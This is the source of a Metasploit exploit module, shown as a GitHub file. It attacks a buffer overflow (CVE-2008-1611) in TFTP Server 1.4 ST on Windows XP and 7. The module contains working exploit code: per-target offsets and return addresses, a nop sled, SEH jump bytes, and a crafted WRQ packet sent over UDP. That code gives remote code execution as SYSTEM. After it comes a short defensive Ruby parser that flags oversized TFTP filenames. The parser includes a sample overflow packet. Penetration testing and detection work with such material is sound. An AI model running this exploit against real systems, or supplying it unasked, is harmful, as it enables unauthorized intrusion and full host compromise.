rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',
        'Description' => %q{
          This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw
          is due to the way TFTP handles the filename parameter extracted from a WRQ request.
          The server will append the user-supplied filename to the TFTP server binary's path
          without any bounds checking, and then attempt to check this path with a fopen().
          Since this isn't a valid file path, fopen() returns null, which allows the
          corrupted data to be used in a strcmp() function, causing an access violation.

          Since the offset is sensitive to how the TFTP server is launched, you must know
          in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone',
          and then manually select your target accordingly. A successful attempt will lead
          to remote code execution under the context of SYSTEM if run as a service, or
          the user if run as a standalone. A failed attempt will result in a denial-of-service.
        },
        'Author' => [
          'Mati Aharoni', # Initial discovery, PoC
          'Datacut' # Metasploit
        ],
        'References' => [
          [ 'CVE', '2008-1611' ],
          [ 'OSVDB', '43785' ],
          [ 'BID', '18345' ],
          [ 'EDB', '5314' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'seh',
        },
        'Payload' => {
          'Space' => 600,
          'BadChars' => "\x00\x2f",
          'StackAdjustment' => -3500
        },
        'Platform' => 'win',
        'Targets' => [
          # datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1.
          # possibly may work for other service packs and/or vista
          # Rets = P/P/R from tftpserversp.exe
          [ 'Windows XP SP2/SP3 EN Service Mode', { 'Ret' => 0x416801, 'Offset' => 1203 } ],
          [ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801, 'Offset' => 1487 } ],
          [ 'Windows 7 SP0/SP1 EN x64 Service Mode', { 'Ret' => 0x416801, 'Offset' => 1217 } ],
          [ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801, 'Offset' => 1501 } ],
          [ 'Windows 7 SP0/SP1 EN x86 Service Mode', { 'Ret' => 0x416801, 'Offset' => 1223 } ],
          [ 'Windows 7 SP0/SP1 EN x86 Standalone Mode', { 'Ret' => 0x416801, 'Offset' => 1507 } ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2008-03-26',
        'DefaultTarget' => 4,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    ) # TFTP is installed as a service

    register_options(
      [
        Opt::RPORT(69)
      ]
    )
  end

  def exploit
    connect_udp

    nops = make_nops(50)
    lead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - nops.length)
    near = "\xe9\x80\xfd\xff\xff" # jump back 640 bytes to the nop sled
    nseh = "\xeb\xf9" + make_nops(2) # jump back 7 bytes to the long jump

    evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')
    mode = "netascii"

    # Send the WRQ packet (header "\x00\x02")
    sploit = "\x00\x02" + evil + "\0" + mode + "\0"

    udp_sock.put(sploit)

    handler
    disconnect_udp
  end
end
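The WRQ packet the module builds above (2-byte opcode, NUL-terminated filename, NUL-terminated mode) is easy to parse and easy to flag on the wire. The following is an added defensive example, not part of the Metasploit module or any rapid7 code: a small Ruby parser for TFTP RRQ/WRQ packets that a defender can run over captured UDP/69 payloads to surface filenames of the size and shape this module sends. The 255-byte threshold, the KNOWN_MODES list and the sample packets are assumptions constructed for the example.

```ruby
# Added example, not part of the Metasploit module or rapid7's code: a minimal
# parser for TFTP RRQ/WRQ packets that a defender can run over captured UDP/69
# payloads to flag the oversized, non-printable filename this module sends.

TFTP_OPCODES = { 1 => 'RRQ', 2 => 'WRQ' }.freeze
# Assumption: real filenames are far shorter than the 1203+ byte offsets used above.
MAX_SANE_FILENAME = 255
KNOWN_MODES = %w[netascii octet mail].freeze

# Parses a TFTP read/write request: 2-byte opcode, NUL-terminated filename,
# NUL-terminated mode. Returns a hash, or nil for anything that is not a
# well-formed RRQ/WRQ (other opcode, missing NUL terminators, truncated packet).
def parse_tftp_request(payload)
  payload = payload.b
  return nil if payload.bytesize < 4
  kind = TFTP_OPCODES[payload.byteslice(0, 2).unpack1('n')]
  return nil unless kind
  filename, mode = payload.byteslice(2, payload.bytesize - 2).split("\0", 3)
  return nil if filename.nil? || mode.nil?
  { op: kind, filename: filename, mode: mode.downcase }
end

# Returns the list of reasons a request looks like an overflow attempt rather
# than a normal transfer; an empty list means nothing stood out.
def suspicious_tftp_request(payload, max_len: MAX_SANE_FILENAME)
  req = parse_tftp_request(payload)
  return ['malformed request'] if req.nil?
  name = req[:filename]
  reasons = []
  reasons << "filename length #{name.bytesize} > #{max_len}" if name.bytesize > max_len
  reasons << 'non-printable bytes in filename' if name =~ /[^\x20-\x7e]/n
  reasons << "unknown transfer mode #{req[:mode].inspect}" unless KNOWN_MODES.include?(req[:mode])
  reasons
end

# Constructed sample traffic: one ordinary WRQ and one shaped like this module's
# packet (opcode 0x0002 and a 1223-byte filename mirroring the default target's
# offset, ending in the same 5-byte near jump the module uses, with no payload).
SAMPLE_PACKETS = {
  'benign'   => "\x00\x02firmware.bin\0octet\0",
  'overflow' => "\x00\x02" + ('A' * 1218) + "\xe9\x80\xfd\xff\xff" + "\0netascii\0"
}.freeze

def audit_samples(packets = SAMPLE_PACKETS)
  packets.transform_values { |pkt| suspicious_tftp_request(pkt) }
end

puts audit_samples.map { |k, v| "#{k}: #{v.empty? ? 'ok' : v.join('; ')}" } if $PROGRAM_NAME == __FILE__
```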